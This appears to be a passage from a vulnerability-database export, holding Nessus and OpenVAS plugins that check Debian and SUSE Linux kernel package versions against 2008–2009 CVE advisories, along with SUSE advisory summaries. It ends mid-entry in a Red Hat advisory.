CVE-2009-1192\n Shaohua Li reported an issue in the AGP subsystem that\n may allow local users to read sensitive kernel memory\n due to a leak of uninitialized memory.\n\n - CVE-2009-1242\n Benjamin Gilbert reported a local denial of service\n vulnerability in the KVM VMX implementation that allows\n local users to trigger an oops.\n\n - CVE-2009-1265\n Thomas Pollet reported an overflow in the af_rose\n implementation that allows remote attackers to retrieve\n uninitialized kernel memory that may contain sensitive\n data.\n\n - CVE-2009-1337\n Oleg Nesterov discovered an issue in the exit_notify\n function that allows local users to send an arbitrary\n signal to a process by running a program that modifies\n the exit_signal field and then uses an exec system call\n to launch a setuid application.\n\n - CVE-2009-1338\n Daniel Hokka Zakrisson discovered that a kill(-1) is\n permitted to reach processes outside of the current\n process namespace.\n\n - CVE-2009-1439\n Pavan Naregundi reported an issue in the CIFS filesystem\n code that allows remote users to overwrite memory via a\n long nativeFileSystem field in a Tree Connect response\n during mount.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2008-4307\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2008-5079\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2008-5395\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2008-5700\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2008-5701\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2008-5702\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2009-0028\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2009-0029\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2009-0031\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2009-0065\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2009-0269\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2009-0322\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2009-0675\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2009-0676\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2009-0745\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2009-0834\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2009-0859\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2009-1046\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2009-1192\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2009-1242\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2009-1265\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2009-1337\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2009-1338\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2009-1439\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2009/dsa-1787\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the linux-2.6.24 packages.\n\nFor the oldstable distribution (etch), these problems have been fixed\nin version 2.6.24-6~etchnhalf.8etch1.\n\nNote: Debian 'etch' includes linux kernel packages based upon both the\n2.6.18 and 2.6.24 linux releases. All known security issues are\ncarefully tracked against both packages and both packages will receive\nsecurity updates until security support for Debian 'etch' concludes.\nHowever, given the high frequency at which low-severity security\nissues are discovered in the kernel and the resource requirements of\ndoing an update, lower severity 2.6.18 and 2.6.24 updates will\ntypically release in a staggered or 'leap-frog' fashion.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_cwe_id(20, 119, 189, 264, 362, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-2.6.24\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:4.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/12/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/05/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/05/04\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"4.0\", prefix:\"linux-doc-2.6.24\", reference:\"2.6.24-6~etchnhalf.8etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"linux-headers-2.6.24-etchnhalf.1-486\", reference:\"2.6.24-6~etchnhalf.8etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"linux-headers-2.6.24-etchnhalf.1-4kc-malta\", reference:\"2.6.24-6~etchnhalf.8etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"linux-headers-2.6.24-etchnhalf.1-5kc-malta\", reference:\"2.6.24-6~etchnhalf.8etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"linux-headers-2.6.24-etchnhalf.1-686\", reference:\"2.6.24-6~etchnhalf.8etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"linux-headers-2.6.24-etchnhalf.1-686-bigmem\", reference:\"2.6.24-6~etchnhalf.8etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"linux-headers-2.6.24-etchnhalf.1-all\", reference:\"2.6.24-6~etchnhalf.8etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"linux-headers-2.6.24-etchnhalf.1-all-alpha\", reference:\"2.6.24-6~etchnhalf.8etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"linux-headers-2.6.24-etchnhalf.1-all-amd64\", reference:\"2.6.24-6~etchnhalf.8etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"linux-headers-2.6.24-etchnhalf.1-all-arm\", reference:\"2.6.24-6~etchnhalf.8etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"linux-headers-2.6.24-etchnhalf.1-all-hppa\", reference:\"2.6.24-6~etchnhalf.8etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"linux-headers-2.6.24-etchnhalf.1-all-i386\", reference:\"2.6.24-6~etchnhalf.8etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"linux-headers-2.6.24-etchnhalf.1-all-ia64\", reference:\"2.6.24-6~etchnhalf.8etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"linux-headers-2.6.24-etchnhalf.1-all-mips\", reference:\"2.6.24-6~etchnhalf.8etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"linux-headers-2.6.24-etchnhalf.1-all-mipsel\", reference:\"2.6.24-6~etchnhalf.8etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"linux-headers-2.6.24-etchnhalf.1-all-powerpc\", reference:\"2.6.24-6~etchnhalf.8etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"linux-headers-2.6.24-etchnhalf.1-all-s390\", reference:\"2.6.24-6~etchnhalf.8etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"linux-headers-2.6.24-etchnhalf.1-all-sparc\", reference:\"2.6.24-6~etchnhalf.8etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"linux-headers-2.6.24-etchnhalf.1-alpha-generic\", reference:\"2.6.24-6~etchnhalf.8etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"linux-headers-2.6.24-etchnhalf.1-alpha-legacy\", reference:\"2.6.24-6~etchnhalf.8etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"linux-headers-2.6.24-etchnhalf.1-alpha-smp\", reference:\"2.6.24-6~etchnhalf.8etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"linux-headers-2.6.24-etchnhalf.1-amd64\", reference:\"2.6.24-6~etchnhalf.8etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"linux-headers-2.6.24-etchnhalf.1-common\", reference:\"2.6.24-6~etchnhalf.8etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"linux-headers-2.6.24-etchnhalf.1-footbridge\", reference:\"2.6.24-6~etchnhalf.8etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"linux-headers-2.6.24-etchnhalf.1-iop32x\", reference:\"2.6.24-6~etchnhalf.8etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"linux-headers-2.6.24-etchnhalf.1-itanium\", reference:\"2.6.24-6~etchnhalf.8etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"linux-headers-2.6.24-etchnhalf.1-ixp4xx\", reference:\"2.6.24-6~etchnhalf.8etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"linux-headers-2.6.24-etchnhalf.1-mckinley\", reference:\"2.6.24-6~etchnhalf.8etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"linux-headers-2.6.24-etchnhalf.1-parisc\", reference:\"2.6.24-6~etchnhalf.8etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"linux-headers-2.6.24-etchnhalf.1-parisc-smp\", reference:\"2.6.24-6~etchnhalf.8etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"linux-headers-2.6.24-etchnhalf.1-parisc64\", reference:\"2.6.24-6~etchnhalf.8etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"linux-headers-2.6.24-etchnhalf.1-parisc64-smp\", reference:\"2.6.24-6~etchnhalf.8etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"linux-headers-2.6.24-etchnhalf.1-powerpc\", reference:\"2.6.24-6~etchnhalf.8etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"linux-headers-2.6.24-etchnhalf.1-powerpc-miboot\", reference:\"2.6.24-6~etchnhalf.8etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"linux-headers-2.6.24-etchnhalf.1-powerpc-smp\", reference:\"2.6.24-6~etchnhalf.8etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"linux-headers-2.6.24-etchnhalf.1-powerpc64\", reference:\"2.6.24-6~etchnhalf.8etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"linux-headers-2.6.24-etchnhalf.1-r4k-ip22\", reference:\"2.6.24-6~etchnhalf.8etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"linux-headers-2.6.24-etchnhalf.1-r5k-cobalt\", reference:\"2.6.24-6~etchnhalf.8etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"linux-headers-2.6.24-etchnhalf.1-r5k-ip32\", reference:\"2.6.24-6~etchnhalf.8etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"linux-headers-2.6.24-etchnhalf.1-s390\", reference:\"2.6.24-6~etchnhalf.8etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"linux-headers-2.6.24-etchnhalf.1-s390x\", reference:\"2.6.24-6~etchnhalf.8etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"linux-headers-2.6.24-etchnhalf.1-sb1-bcm91250a\", reference:\"2.6.24-6~etchnhalf.8etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"linux-headers-2.6.24-etchnhalf.1-sb1a-bcm91480b\", reference:\"2.6.24-6~etchnhalf.8etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"linux-headers-2.6.24-etchnhalf.1-sparc64\", reference:\"2.6.24-6~etchnhalf.8etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"linux-headers-2.6.24-etchnhalf.1-sparc64-smp\", reference:\"2.6.24-6~etchnhalf.8etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"linux-image-2.6.24-etchnhalf.1-486\", reference:\"2.6.24-6~etchnhalf.8etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"linux-image-2.6.24-etchnhalf.1-4kc-malta\", reference:\"2.6.24-6~etchnhalf.8etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"linux-image-2.6.24-etchnhalf.1-5kc-malta\", reference:\"2.6.24-6~etchnhalf.8etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"linux-image-2.6.24-etchnhalf.1-686\", reference:\"2.6.24-6~etchnhalf.8etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"linux-image-2.6.24-etchnhalf.1-686-bigmem\", reference:\"2.6.24-6~etchnhalf.8etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"linux-image-2.6.24-etchnhalf.1-alpha-generic\", reference:\"2.6.24-6~etchnhalf.8etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"linux-image-2.6.24-etchnhalf.1-alpha-legacy\", reference:\"2.6.24-6~etchnhalf.8etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"linux-image-2.6.24-etchnhalf.1-alpha-smp\", reference:\"2.6.24-6~etchnhalf.8etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"linux-image-2.6.24-etchnhalf.1-amd64\", reference:\"2.6.24-6~etchnhalf.8etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"linux-image-2.6.24-etchnhalf.1-footbridge\", reference:\"2.6.24-6~etchnhalf.8etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"linux-image-2.6.24-etchnhalf.1-iop32x\", reference:\"2.6.24-6~etchnhalf.8etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"linux-image-2.6.24-etchnhalf.1-itanium\", reference:\"2.6.24-6~etchnhalf.8etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"linux-image-2.6.24-etchnhalf.1-ixp4xx\", reference:\"2.6.24-6~etchnhalf.8etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"linux-image-2.6.24-etchnhalf.1-mckinley\", reference:\"2.6.24-6~etchnhalf.8etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"linux-image-2.6.24-etchnhalf.1-parisc\", reference:\"2.6.24-6~etchnhalf.8etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"linux-image-2.6.24-etchnhalf.1-parisc-smp\", reference:\"2.6.24-6~etchnhalf.8etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"linux-image-2.6.24-etchnhalf.1-parisc64\", reference:\"2.6.24-6~etchnhalf.8etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"linux-image-2.6.24-etchnhalf.1-parisc64-smp\", reference:\"2.6.24-6~etchnhalf.8etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"linux-image-2.6.24-etchnhalf.1-powerpc\", reference:\"2.6.24-6~etchnhalf.8etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"linux-image-2.6.24-etchnhalf.1-powerpc-miboot\", reference:\"2.6.24-6~etchnhalf.8etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"linux-image-2.6.24-etchnhalf.1-powerpc-smp\", reference:\"2.6.24-6~etchnhalf.8etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"linux-image-2.6.24-etchnhalf.1-powerpc64\", reference:\"2.6.24-6~etchnhalf.8etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"linux-image-2.6.24-etchnhalf.1-r4k-ip22\", reference:\"2.6.24-6~etchnhalf.8etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"linux-image-2.6.24-etchnhalf.1-r5k-cobalt\", reference:\"2.6.24-6~etchnhalf.8etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"linux-image-2.6.24-etchnhalf.1-r5k-ip32\", reference:\"2.6.24-6~etchnhalf.8etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"linux-image-2.6.24-etchnhalf.1-s390\", reference:\"2.6.24-6~etchnhalf.8etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"linux-image-2.6.24-etchnhalf.1-s390-tape\", reference:\"2.6.24-6~etchnhalf.8etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"linux-image-2.6.24-etchnhalf.1-s390x\", reference:\"2.6.24-6~etchnhalf.8etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"linux-image-2.6.24-etchnhalf.1-sb1-bcm91250a\", reference:\"2.6.24-6~etchnhalf.8etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"linux-image-2.6.24-etchnhalf.1-sb1a-bcm91480b\", reference:\"2.6.24-6~etchnhalf.8etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"linux-image-2.6.24-etchnhalf.1-sparc64\", reference:\"2.6.24-6~etchnhalf.8etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"linux-image-2.6.24-etchnhalf.1-sparc64-smp\", reference:\"2.6.24-6~etchnhalf.8etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"linux-manual-2.6.24\", reference:\"2.6.24-6~etchnhalf.8etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"linux-patch-debian-2.6.24\", reference:\"2.6.24-6~etchnhalf.8etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"linux-source-2.6.24\", reference:\"2.6.24-6~etchnhalf.8etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"linux-support-2.6.24-etchnhalf.1\", reference:\"2.6.24-6~etchnhalf.8etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"linux-tree-2.6.24\", reference:\"2.6.24-6~etchnhalf.8etch1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2016-09-04T11:46:06", "description": "The Linux kernel for SUSE Linux Enterprise 10 Service Pack 2 was updated to fixes various bugs and several security issues.\n#### Solution\nThere is no known workaround, please install the update packages.", "cvss3": {}, "published": "2009-04-03T14:20:16", "type": "suse", "title": "remote denial of service in kernel", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2009-1046", "CVE-2008-1294", "CVE-2009-0675", "CVE-2009-0028", "CVE-2009-0676", "CVE-2009-0065"], "modified": "2009-04-03T14:20:16", "id": "SUSE-SA:2009:017", "href": "http://lists.opensuse.org/opensuse-security-announce/2009-04/msg00002.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:59:55", "description": "The Linux kernel update fixes the following security issues: CVE-2009-2692: A missing NULL pointer check in the socket sendpage function can be used by local attackers to gain root privileges. [SLES9, SLES10-SP2, SLE11, openSUSE] CVE-2009-1389: A crash on r8169 network cards when receiving large packets was fixed. [SLES9, SLES10-SP2, SLE11, openSUSE] CVE-2009-1758: The hypervisor_callback function in Xen allows guest user applications to cause a denial of service (kernel oops) of the guest OS by triggering a segmentation fault in certain address ranges. [SLES9, SLES10-SP2, SLE11, openSUSE] CVE-2009-1630: The nfs_permission function in fs/nfs/dir.c in the NFS client implementation in the Linux kernel, when atomic_open is available, does not check execute (aka EXEC or MAY_EXEC) permission bits, which allows local users to bypass permissions and execute files, as demonstrated by files on an NFSv4 fileserver [SLE10-SP2, SLE11, openSUSE] CVE-2009-2406: A kernel stack overflow when mounting eCryptfs filesystems in parse_tag_11_packet() was fixed. Code execution might be possible if ecryptfs is in use. [SLE11, openSUSE] CVE-2009-2407: A kernel heap overflow when mounting eCryptfs filesystems in parse_tag_3_packet() was fixed. Code execution might be possible if ecryptfs is in use. [SLE11, openSUSE] (no CVE assigned yet): An information leak from using sigaltstack. [SLES9, SLES10-SP2, SLE11, openSUSE] CVE-2009-0676: A memory disclosure via the SO_BSDCOMPAT socket option [openSUSE 10.3 only] CVE-2009-1895: Personality flags on set*id were not cleared correctly, so ASLR and NULL page protection could be bypassed. [openSUSE 11.0 only] CVE-2009-1046: utf-8 console memory corruption that can be used for local privilege escalation [openSUSE 11.0 only] CVE-2008-5033: Oops in video4linux tvaudio [openSUSE 11.0 only] CVE-2009-1385: A Integer underflow in the e1000_clean_rx_irq function in drivers/net/e1000/e1000_main.c in the e1000 driver the e1000e driver in the Linux kernel, and Intel Wired Ethernet (aka e1000) before 7.5.5 allows remote attackers to cause a denial of service (panic) via a crafted frame size. [openSUSE 11.0 only] The mmap_min_addr sysctl is now enabled by default to protect against kernel NULL page exploits. [SLE11, openSUSE 11.0-11.1] The -fno-delete-null-pointer-checks compiler option is now used to build the kernel to avoid gcc optimizing away NULL pointer checks. Also -fwrapv is now used everywhere. [SLES9, SLES10-SP2, SLE11, openSUSE] The kernel update also contains numerous other, non-security bug fixes. Please refer to the rpm changelog for a detailed list.\n#### Solution\nThere is no known workaround against all of the listed issues, please install the updated packages.", "cvss3": {}, "published": "2009-08-20T16:02:11", "type": "suse", "title": "local privilege escalation in kernel", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2009-1895", "CVE-2009-2692", "CVE-2009-1046", "CVE-2009-1385", "CVE-2009-1758", "CVE-2009-0676", "CVE-2008-5033", "CVE-2009-2407", "CVE-2009-1389", "CVE-2009-2406", "CVE-2009-1630"], "modified": "2009-08-20T16:02:11", "id": "SUSE-SA:2009:045", "href": "http://lists.opensuse.org/opensuse-security-announce/2009-08/msg00007.html", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2017-07-26T08:55:17", "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n kernel-bigsmp\n kernel-debug\n kernel-default\n kernel-kdump\n kernel-smp\n kernel-source\n kernel-syms\n kernel-vmi\n kernel-vmipae\n kernel-xen\n kernel-xenpae\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 10 patch database located at\nhttp://download.novell.com/patch/finder/", "cvss3": {}, "published": "2009-10-13T00:00:00", "type": "openvas", "title": "SLES10: Security update for Linux kernel", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1046", "CVE-2008-1294", "CVE-2009-0675", "CVE-2009-0028", "CVE-2009-0676", "CVE-2009-0065"], "modified": "2017-07-11T00:00:00", "id": "OPENVAS:65812", "href": "http://plugins.openvas.org/nasl.php?oid=65812", "sourceData": "#\n#VID slesp2-kernel-6109\n# OpenVAS Vulnerability Test\n# $\n# Description: Security update for Linux kernel\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n kernel-bigsmp\n kernel-debug\n kernel-default\n kernel-kdump\n kernel-smp\n kernel-source\n kernel-syms\n kernel-vmi\n kernel-vmipae\n kernel-xen\n kernel-xenpae\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 10 patch database located at\nhttp://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n\nif(description)\n{\n script_id(65812);\n script_version(\"$Revision: 6666 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:13:36 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-13 18:25:40 +0200 (Tue, 13 Oct 2009)\");\n script_cve_id(\"CVE-2009-0675\", \"CVE-2009-0676\", \"CVE-2009-0028\", \"CVE-2008-1294\", \"CVE-2009-0065\", \"CVE-2009-1046\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SLES10: Security update for Linux kernel\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"kernel-bigsmp\", rpm:\"kernel-bigsmp~2.6.16.60~0.37_f594963d\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.16.60~0.37_f594963d\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~2.6.16.60~0.37_f594963d\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-kdump\", rpm:\"kernel-kdump~2.6.16.60~0.37_f594963d\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp\", rpm:\"kernel-smp~2.6.16.60~0.37_f594963d\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~2.6.16.60~0.37_f594963d\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-syms\", rpm:\"kernel-syms~2.6.16.60~0.37_f594963d\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-vmi\", rpm:\"kernel-vmi~2.6.16.60~0.37_f594963d\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-vmipae\", rpm:\"kernel-vmipae~2.6.16.60~0.37_f594963d\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~2.6.16.60~0.37_f594963d\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-xenpae\", rpm:\"kernel-xenpae~2.6.16.60~0.37_f594963d\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-27T10:56:22", "description": "The remote host is missing updates announced in\nadvisory RHSA-2009:0451.\n\nThe kernel-rt packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThese updated packages fix the following security issues:\n\n* a logic error was found in the do_setlk() function of the Linux kernel\nNetwork File System (NFS) 